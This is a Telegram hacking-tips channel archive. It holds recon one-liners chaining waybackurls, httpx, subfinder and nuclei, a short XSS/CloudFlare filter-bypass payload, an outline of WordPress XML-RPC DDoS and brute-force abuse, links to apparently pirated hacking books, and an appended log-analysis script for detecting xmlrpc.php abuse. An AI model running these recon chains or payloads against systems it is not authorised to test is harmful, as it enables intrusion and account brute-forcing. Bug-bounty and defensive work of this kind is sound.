Termux All Command [Telegram Group]


Hello, this is the Termux All Command official Telegram group. All kinds of resources are shared here. It is also a backup of the Facebook page.
Telegram Channel >> https://t.me/termuxcommandfull
Facebook Page >> https://www.facebook.com/termux.command.full

1 185 subscribers
Post archive
JS Recon: WaybackURLs & HTTPX

waybackurls url | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} python lazyegg.py "{}" --js_urls --domains --ips > urls && cat urls | grep '\.' | sort -u | xargs -I{} httpx -silent -u {} -sc -title -td

Do not forget to react ❤️ to this message for more content like this.

[12 BOOKS OF HACKING AND PENETRATION TESTING: BEGINNERS TO ADVANCE]

✔️ All links posted here are just shared from other available media and all of them are benign ✔️

1. Gray Hat Hacking The Ethical Hacker’s Handbook. ⛔️ https://lnkd.in/dXYJriEG
2. Gray Hat Hacking: The Ethical Hacker’s Handbook, Fifth Edition ⛔️ https://lnkd.in/dx-z3eqn
3. Gray Hat Hacking: The Ethical Hacker’s Handbook, Fourth Edition ⛔️ https://lnkd.in/duwdhUwq
4. Gray Hat Hacking: The Ethical Hacker’s Handbook, Second Edition. ⛔️ https://lnkd.in/dmYhinjD
5. Penetration Testing: A Survival Guide. ⛔️ https://lnkd.in/d2v3ykw6
6. Mastering Modern Web Penetration Testing. ⛔️ https://lnkd.in/d7skwMTF
7. THE HACKER PLAYBOOK 2 Practical Guide To Penetration Testing. ⛔️ https://lnkd.in/ddagnRyG
8. The Basics of hacking and penetration testing. ⛔️ https://lnkd.in/deAFkz_w
9. Quick Start Guide to Penetration Testing. ⛔️ https://lnkd.in/dVrXMSZ5
10. ETHICAL HACKING AND PENETRATION TESTING GUIDE. ⛔️ https://lnkd.in/d8swSeft
11. ETHICAL HACKING 101 How to conduct professional pentestings in 21 days or less! ⛔️ https://lnkd.in/dMJAx-Jc
12. HackLOG Security & Ethical Hacking Handbook VOLUME 1 ANONYMITY ⛔️ https://lnkd.in/dkKnizGa

🚨🚨 SHARE - Do you know other resources? Please share them in the comment 🚨🚨

You should read these new articles.

1- Story of Http password reset link for $500 https://lnkd.in/dbGwbMWt
2- A Story of Zero-click Complete Account Takeover Via Response Manipulation https://lnkd.in/d26DQ5cN
3- Penetration Testing with Termux: A Newbie’s Success Story https://lnkd.in/dRmBUDrX
4- Inside JSON Web Tokens (JWT): Security Insights and Exploits https://lnkd.in/dt2ikHvh
5- Mastering Subdomain Takeovers https://lnkd.in/dUB7zXqm
6- How to Detect if Your Mobile Phone Has Been Hacked: Signs and Steps to Take https://lnkd.in/dMHhFUbS

IObit Uninstaller Keys

linux-command-line-and-shell-scripting-bible.pdf (17.00 MB)

🔛 All the links posted here are benign 🔛

1. The Tangled Web. A Guide to Securing Modern Web Applications 🤓 https://lnkd.in/dfXn2u3f
2. Web App Hacking (Hackers Handbook) 🤓 https://lnkd.in/dtMx8hZD
3. Pentesting Azure Applications. 🤓 https://lnkd.in/dxbWzRjY
4. Gray Hat C# a Hacker’s Guide to Creating and automating Security tools by Brandon Perry 🤓 https://lnkd.in/dpGxAuZx
5. Linux Command Line and Shell Scripting Bible (Massive Guide 1052 pages) 🤓 https://lnkd.in/dRBfKR6x
6. Nmap Official Guide + Scripts. 🤓 https://lnkd.in/dyHfjvEB
7. Antivirus Hackers handbook. 🤓 https://lnkd.in/dBb2bv6W
8. Network Security Bible. 🤓 https://lnkd.in/dyUvi7xx
9. Hacking Bible 🤓 https://lnkd.in/d8FJxvEr

Open redirect payloads # Payloads to detect open redirection

Hiii bug hunters

Today I found IDOR. I found JS file /static/js/main.a32c4.js, Ctrl+F, I searched for /admin, I found path adminuser.

Tips: Use this command to extract JS endpoints:

waybackurls "example.com" | grep -Eo 'https?://[^/]+/[^"]+\.js' | sed 's|^https\?://[^/]\+/||' | awk -F '/' '{print $NF}' > JSEndpoints

waybackurls "example.com": This command retrieves URLs associated with "example.com" from the Wayback Machine archives.
grep -Eo 'https?://[^/]+/[^"]+\.js': This command searches for URLs with a .js extension. The -E flag enables extended regular expressions, and the -o flag tells grep to output only the matching parts.
sed 's|^https\?://[^/]\+/||': This command removes the protocol (http:// or https://) and domain name from each URL, leaving only the path.
awk -F '/' '{print $NF}': This command extracts the last part of each URL after splitting it by /, effectively removing the domain part.

Try to use the JSEndpoints with dirsearch, useful for directory listing:

dirsearch -u https://example.com -w JSEndpoints

Check out xss bypass payload using console.log 😎 XSS

Back Again After a Short Break!!

Bug Bounty Tips

1. waybackurls target.com | grep = | urless | anew | tee param.txt
2. cat param.txt | nuclei -t fuzzing-templates -dast

" TEETO " A simple and completely free extension to quickly analyse a web page. Finds endpoints (URLs), secrets (API-keys etc) and URL parameters. : https://chromewebstore.google.com/detail/teeto/jkonpljnfkapenfcfdhmilkbmnbalnml

subfinder -d canva.com -silent | httpx -silent | hakrawler -u | grep "canva.com"

SQL injection to XSS bypass + CloudFlare bypass Payload: '<00 foo="XSS-CLick--%20/

Tips :- 🚨X-Recon: A utility for detecting webpage inputs and conducting XSS scans.🚨 Features: 1. Subdomain Discovery 2. Site-wide Link Discovery 3. Form and Input Extraction 4. XSS Scanning 🔗Link: https://lnkd.in/gfAeBPz7

Exploiting Wordpress XML-RPC file

The XMLRPC is a system that allows remote updates to WordPress from other applications. For instance, the Windows Live Writer system is capable of posting blogs directly to WordPress because of xmlrpc.php. In essence, xmlrpc.php could open the site to various attacks and other issues.

The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface. These include:

Publish a post
Edit a post
Delete a post
Upload a new file (e.g. an image for a post)
Get a list of comments
Edit comments

DDOS ATTACK

Now, considering that file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below.

BRUTEFORCE ATTACK

To perform a bruteforce login attack, send the following in the POST request, if you know any valid usernames that would be even better (wp-scan would help). Though you should always get a 200 OK response, you should be able to tell if the login you entered on the intruder is correct.

Remediation: If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.
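
Added example, not part of the original post: since the post notes that xmlrpc.php answers 200 OK whether or not a login guess succeeds, status codes do not reveal abuse, so a defender looks at request volume per client instead. The script below counts POSTs to xmlrpc.php per client IP in a "combined"-format access log; the log lines, IP addresses and threshold are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: flag clients sending many POSTs to xmlrpc.php.
# Assumes the Apache/nginx "combined" access-log format.

# Constructed sample log (documentation IP ranges), not real traffic.
sample_log() {
cat <<'EOF'
203.0.113.7 - - [10/May/2024:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "curl/8.0"
203.0.113.7 - - [10/May/2024:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "curl/8.0"
203.0.113.7 - - [10/May/2024:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "curl/8.0"
203.0.113.7 - - [10/May/2024:10:00:02 +0000] "POST //XMLRPC.php?x=1 HTTP/1.1" 200 403 "-" "curl/8.0"
198.51.100.9 - - [10/May/2024:10:01:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 221 "-" "WordPress-App/1.0"
198.51.100.9 - - [10/May/2024:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.5 - - [10/May/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.5 - - [10/May/2024:10:02:03 +0000] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "Mozilla/5.0"
EOF
}

# Read a log on stdin; print "ip count" for each client with at least
# $1 POST requests to xmlrpc.php (default threshold 3, an assumed value).
xmlrpc_suspects() {
  threshold="${1:-3}"
  awk -v t="$threshold" '
    # Combined format: $1 = client IP, $6 = "\"METHOD", $7 = request path
    $6 == "\"POST" {
      path = $7
      sub(/\?.*/, "", path)                 # drop any query string
      if (tolower(path) ~ /\/xmlrpc\.php$/) # case and extra slashes ignored
        hits[$1]++
    }
    END { for (ip in hits) if (hits[ip] >= t) print ip, hits[ip] }
  ' | sort
}

# Stand-alone run on the constructed sample.
sample_log | xmlrpc_suspects 3
```

On a real server, pipe the access log into `xmlrpc_suspects` with a threshold suited to the time window the log covers.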